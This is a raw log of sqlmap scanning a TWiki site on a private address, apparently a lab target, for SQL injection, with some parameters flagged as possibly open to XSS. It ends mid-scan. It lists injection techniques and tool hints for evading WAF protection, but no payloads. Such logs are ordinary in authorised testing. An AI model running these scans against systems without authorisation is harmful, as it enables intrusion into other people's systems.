[19:24:53] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:24:54] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:24:54] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:24:55] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:24:55] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:24:56] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:24:57] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:24:58] [INFO] testing 'Oracle AND time-based blind'
[19:24:58] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:24:58] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:25:06] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:25:14] [WARNING] GET parameter 't' is not injectable
[19:25:14] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 103:
GET http://192.168.1.113:80/twiki/bin/search/TWiki/SearchResult?scope=text&regex=on&search=TWiki *History[^A-Za-z]
do you want to test this URL? [Y/n/q]
> Y
[19:25:14] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/search/TWiki/SearchResult?scope=text&regex=on&search=TWiki *History[^A-Za-z]'
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[19:25:14] [INFO] testing connection to the target URL
[19:25:14] [INFO] testing if the target URL is stable
[19:25:15] [INFO] target URL is stable
[19:25:15] [INFO] testing if URI parameter '#1*' is dynamic
[19:25:15] [INFO] confirming that URI parameter '#1*' is dynamic
[19:25:15] [INFO] URI parameter '#1*' is dynamic
[19:25:15] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[19:25:16] [INFO] testing for SQL injection on URI parameter '#1*'
[19:25:16] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:25:16] [WARNING] reflective value(s) found and filtering out
[19:25:17] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:25:18] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:25:18] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:25:19] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:25:19] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:25:20] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:25:20] [INFO] testing 'MySQL inline queries'
[19:25:20] [INFO] testing 'PostgreSQL inline queries'
[19:25:20] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:25:20] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:25:21] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:25:21] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:25:22] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:25:22] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:25:22] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:25:23] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:25:24] [INFO] testing 'Oracle AND time-based blind'
[19:25:24] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:25:24] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:25:30] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:25:36] [WARNING] URI parameter '#1*' is not injectable
[19:25:36] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 104:
GET http://192.168.1.113:80/twiki/bin/view/TWiki/TWikiHistory?skin=print
do you want to test this URL? [Y/n/q]
> Y
[19:25:36] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/TWiki/TWikiHistory?skin=print'
[19:25:36] [INFO] testing connection to the target URL
[19:25:36] [INFO] testing if the target URL is stable
[19:25:37] [INFO] target URL is stable
[19:25:37] [INFO] testing if GET parameter 'skin' is dynamic
[19:25:37] [INFO] confirming that GET parameter 'skin' is dynamic
[19:25:37] [INFO] GET parameter 'skin' is dynamic
[19:25:38] [INFO] heuristics detected web page charset 'ascii'
[19:25:38] [WARNING] heuristic (basic) test shows that GET parameter 'skin' might not be injectable
[19:25:38] [INFO] testing for SQL injection on GET parameter 'skin'
[19:25:38] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:25:38] [WARNING] reflective value(s) found and filtering out
[19:25:40] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:25:40] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:25:41] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:25:42] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:25:43] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:25:44] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:25:44] [INFO] testing 'MySQL inline queries'
[19:25:44] [INFO] testing 'PostgreSQL inline queries'
[19:25:44] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:25:44] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:25:45] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:25:45] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:25:46] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:25:47] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:25:47] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:25:48] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:25:49] [INFO] testing 'Oracle AND time-based blind'
[19:25:50] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:25:50] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:26:00] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:26:11] [WARNING] GET parameter 'skin' is not injectable
[19:26:11] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
[19:26:11] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/TWiki/TWikiHistory?rev1=1.62&rev2=1.61'
[19:26:11] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/TWiki/TWikiHistory?rev=1.61'
[19:26:11] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/TWiki/TWikiHistory?rev1=1.61&rev2=1.60'
[19:26:11] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/TWiki/TWikiHistory?rev=1.60'
URL 105:
GET http://192.168.1.113:80/twiki/bin/oops/TWiki/TWikiHistory?template=oopsmore&param1=1.62&param2=1.62
do you want to test this URL? [Y/n/q]
> Y
[19:26:11] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/oops/TWiki/TWikiHistory?template=oopsmore&param1=1.62&param2=1.62'
[19:26:11] [INFO] testing connection to the target URL
[19:26:12] [INFO] testing if the target URL is stable
[19:26:13] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
[19:26:13] [INFO] skipping previously processed GET parameter 'template'
[19:26:13] [INFO] skipping previously processed GET parameter 'param1'
[19:26:13] [INFO] testing if GET parameter 'param2' is dynamic
[19:26:13] [WARNING] GET parameter 'param2' does not appear dynamic
[19:26:13] [WARNING] heuristic (basic) test shows that GET parameter 'param2' might not be injectable
[19:26:13] [INFO] testing for SQL injection on GET parameter 'param2'
[19:26:13] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:26:13] [WARNING] reflective value(s) found and filtering out
[19:26:15] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:26:15] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:26:15] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:26:16] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:26:17] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:26:17] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:26:17] [INFO] testing 'MySQL inline queries'
[19:26:18] [INFO] testing 'PostgreSQL inline queries'
[19:26:18] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:26:18] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:26:18] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:26:19] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:26:19] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:26:20] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:26:20] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:26:21] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:26:21] [INFO] testing 'Oracle AND time-based blind'
[19:26:22] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:26:22] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:26:30] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:26:38] [WARNING] GET parameter 'param2' is not injectable
[19:26:38] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 106:
GET http://192.168.1.113:80/twiki/bin/edit/TWiki/WelcomeGuest?t=1441457191
do you want to test this URL? [Y/n/q]
> Y
[19:26:38] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/TWiki/WelcomeGuest?t=1441457191'
[19:26:38] [INFO] testing connection to the target URL
[19:26:38] [INFO] testing if the target URL is stable
[19:26:39] [INFO] target URL is stable
[19:26:39] [INFO] testing if GET parameter 't' is dynamic
[19:26:39] [WARNING] GET parameter 't' does not appear dynamic
[19:26:39] [WARNING] heuristic (basic) test shows that GET parameter 't' might not be injectable
[19:26:39] [INFO] testing for SQL injection on GET parameter 't'
[19:26:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:26:40] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:26:41] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:26:41] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:26:42] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:26:42] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:26:43] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:26:43] [INFO] testing 'MySQL inline queries'
[19:26:43] [INFO] testing 'PostgreSQL inline queries'
[19:26:43] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:26:43] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:26:43] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:26:44] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:26:44] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:26:45] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:26:45] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:26:46] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:26:46] [INFO] testing 'Oracle AND time-based blind'
[19:26:47] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:26:47] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:26:52] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:26:58] [WARNING] GET parameter 't' is not injectable
[19:26:58] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 107:
GET http://192.168.1.113:80/twiki/bin/search/TWiki/SearchResult?scope=text&regex=on&search=Welcome *Guest[^A-Za-z]
do you want to test this URL? [Y/n/q]
> Y
[19:26:58] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/search/TWiki/SearchResult?scope=text&regex=on&search=Welcome *Guest[^A-Za-z]'
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[19:26:58] [INFO] testing connection to the target URL
[19:26:58] [INFO] testing if the target URL is stable
[19:26:59] [INFO] target URL is stable
[19:26:59] [INFO] testing if URI parameter '#1*' is dynamic
[19:26:59] [WARNING] URI parameter '#1*' does not appear dynamic
[19:26:59] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[19:26:59] [INFO] testing for SQL injection on URI parameter '#1*'
[19:26:59] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:26:59] [WARNING] reflective value(s) found and filtering out
[19:27:00] [INFO] URI parameter '#1*' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[19:27:00] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:27:01] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:27:01] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:27:01] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:27:01] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:27:01] [INFO] testing 'MySQL inline queries'
[19:27:01] [INFO] testing 'PostgreSQL inline queries'
[19:27:02] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:27:02] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:27:02] [WARNING] time-based comparison requires larger statistical model, please wait......
[19:27:02] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:27:02] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:27:02] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:27:02] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:27:03] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:27:03] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:27:03] [INFO] testing 'Oracle AND time-based blind'
[19:27:03] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[19:27:03] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:27:03] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[19:27:05] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[19:27:07] [INFO] checking if the injection point on URI parameter '#1*' is a false positive
[19:27:07] [WARNING] false positive or unexploitable injection point detected
[19:27:07] [WARNING] URI parameter '#1*' is not injectable
[19:27:07] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 108:
GET http://192.168.1.113:80/twiki/bin/view/TWiki/WelcomeGuest?skin=print
do you want to test this URL? [Y/n/q]
> Y
[19:27:07] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/TWiki/WelcomeGuest?skin=print'
[19:27:07] [INFO] testing connection to the target URL
[19:27:07] [INFO] testing if the target URL is stable
[19:27:08] [INFO] target URL is stable
[19:27:08] [INFO] testing if GET parameter 'skin' is dynamic
[19:27:08] [INFO] confirming that GET parameter 'skin' is dynamic
[19:27:08] [INFO] GET parameter 'skin' is dynamic
[19:27:08] [INFO] heuristics detected web page charset 'ascii'
[19:27:08] [WARNING] heuristic (basic) test shows that GET parameter 'skin' might not be injectable
[19:27:08] [INFO] testing for SQL injection on GET parameter 'skin'
[19:27:09] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:27:09] [WARNING] reflective value(s) found and filtering out
[19:27:10] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:27:10] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:27:11] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:27:12] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:27:12] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:27:13] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:27:13] [INFO] testing 'MySQL inline queries'
[19:27:13] [INFO] testing 'PostgreSQL inline queries'
[19:27:14] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:27:14] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:27:14] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:27:15] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:27:15] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:27:16] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:27:16] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:27:17] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:27:18] [INFO] testing 'Oracle AND time-based blind'
[19:27:19] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:27:19] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:27:26] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:27:34] [WARNING] GET parameter 'skin' is not injectable
[19:27:34] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 109:
GET http://192.168.1.113:80/twiki/bin/rdiff/TWiki/WelcomeGuest?rev1=1.21&rev2=1.20
do you want to test this URL? [Y/n/q]
> Y
[19:27:34] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/rdiff/TWiki/WelcomeGuest?rev1=1.21&rev2=1.20'
[19:27:34] [INFO] testing connection to the target URL
[19:27:34] [INFO] testing if the target URL is stable
[19:27:35] [INFO] target URL is stable
[19:27:35] [INFO] testing if GET parameter 'rev1' is dynamic
[19:27:35] [WARNING] GET parameter 'rev1' does not appear dynamic
[19:27:35] [WARNING] heuristic (basic) test shows that GET parameter 'rev1' might not be injectable
[19:27:36] [INFO] heuristic (XSS) test shows that GET parameter 'rev1' might be vulnerable to XSS attacks
[19:27:36] [INFO] testing for SQL injection on GET parameter 'rev1'
[19:27:36] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:27:36] [WARNING] reflective value(s) found and filtering out
[19:27:37] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:27:37] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:27:37] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:27:38] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:27:39] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:27:39] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:27:39] [INFO] testing 'MySQL inline queries'
[19:27:39] [INFO] testing 'PostgreSQL inline queries'
[19:27:39] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:27:40] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:27:40] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:27:40] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:27:41] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:27:41] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:27:42] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:27:42] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:27:43] [INFO] testing 'Oracle AND time-based blind'
[19:27:43] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:27:43] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:27:50] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:27:56] [WARNING] GET parameter 'rev1' is not injectable
[19:27:56] [INFO] testing if GET parameter 'rev2' is dynamic
[19:27:56] [INFO] confirming that GET parameter 'rev2' is dynamic
[19:27:56] [INFO] GET parameter 'rev2' is dynamic
[19:27:56] [WARNING] heuristic (basic) test shows that GET parameter 'rev2' might not be injectable
[19:27:56] [INFO] heuristic (XSS) test shows that GET parameter 'rev2' might be vulnerable to XSS attacks
[19:27:56] [INFO] testing for SQL injection on GET parameter 'rev2'
[19:27:56] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:27:57] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:27:58] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:27:59] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:28:00] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:28:00] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:28:01] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:28:01] [INFO] testing 'MySQL inline queries'
[19:28:02] [INFO] testing 'PostgreSQL inline queries'
[19:28:03] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:28:03] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:28:04] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:28:04] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:28:05] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:28:05] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:28:05] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:28:06] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:28:07] [INFO] testing 'Oracle AND time-based blind'
[19:28:07] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:28:13] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:28:20] [WARNING] GET parameter 'rev2' is not injectable
[19:28:20] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 110:
GET http://192.168.1.113:80/twiki/bin/view/TWiki/WelcomeGuest?rev=1.20
do you want to test this URL? [Y/n/q]
> Y
[19:28:20] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/TWiki/WelcomeGuest?rev=1.20'
[19:28:20] [INFO] testing connection to the target URL
[19:28:20] [INFO] testing if the target URL is stable
[19:28:21] [INFO] target URL is stable
[19:28:21] [INFO] testing if GET parameter 'rev' is dynamic
[19:28:21] [WARNING] GET parameter 'rev' does not appear dynamic
[19:28:21] [WARNING] heuristic (basic) test shows that GET parameter 'rev' might not be injectable
[19:28:21] [INFO] heuristic (XSS) test shows that GET parameter 'rev' might be vulnerable to XSS attacks
[19:28:21] [INFO] testing for SQL injection on GET parameter 'rev'
[19:28:21] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:28:22] [WARNING] reflective value(s) found and filtering out
[19:28:23] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:28:23] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:28:24] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:28:25] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:28:25] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:28:26] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:28:26] [INFO] testing 'MySQL inline queries'
[19:28:26] [INFO] testing 'PostgreSQL inline queries'
[19:28:26] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:28:26] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:28:26] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:28:27] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:28:27] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:28:28] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:28:28] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:28:29] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:28:29] [INFO] testing 'Oracle AND time-based blind'
[19:28:30] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:28:30] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:28:37] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:28:44] [WARNING] GET parameter 'rev' is not injectable
[19:28:44] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
[19:28:44] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/TWiki/WelcomeGuest?rev1=1.20&rev2=1.19'
[19:28:44] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/TWiki/WelcomeGuest?rev=1.19'
URL 111:
GET http://192.168.1.113:80/twiki/bin/oops/TWiki/WelcomeGuest?template=oopsmore&param1=1.21&param2=1.21
do you want to test this URL? [Y/n/q]
> Y
[19:28:44] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/oops/TWiki/WelcomeGuest?template=oopsmore&param1=1.21&param2=1.21'
[19:28:44] [INFO] testing connection to the target URL
[19:28:44] [INFO] testing if the target URL is stable
[19:28:45] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
[19:28:45] [INFO] testing if GET parameter 'template' is dynamic
[19:28:45] [INFO] confirming that GET parameter 'template' is dynamic
[19:28:45] [INFO] GET parameter 'template' is dynamic
[19:28:45] [INFO] heuristics detected web page charset 'ascii'
[19:28:45] [WARNING] heuristic (basic) test shows that GET parameter 'template' might not be injectable
[19:28:45] [INFO] heuristic (XSS) test shows that GET parameter 'template' might be vulnerable to XSS attacks
[19:28:45] [INFO] testing for SQL injection on GET parameter 'template'
[19:28:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:28:45] [WARNING] reflective value(s) found and filtering out
[19:28:46] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
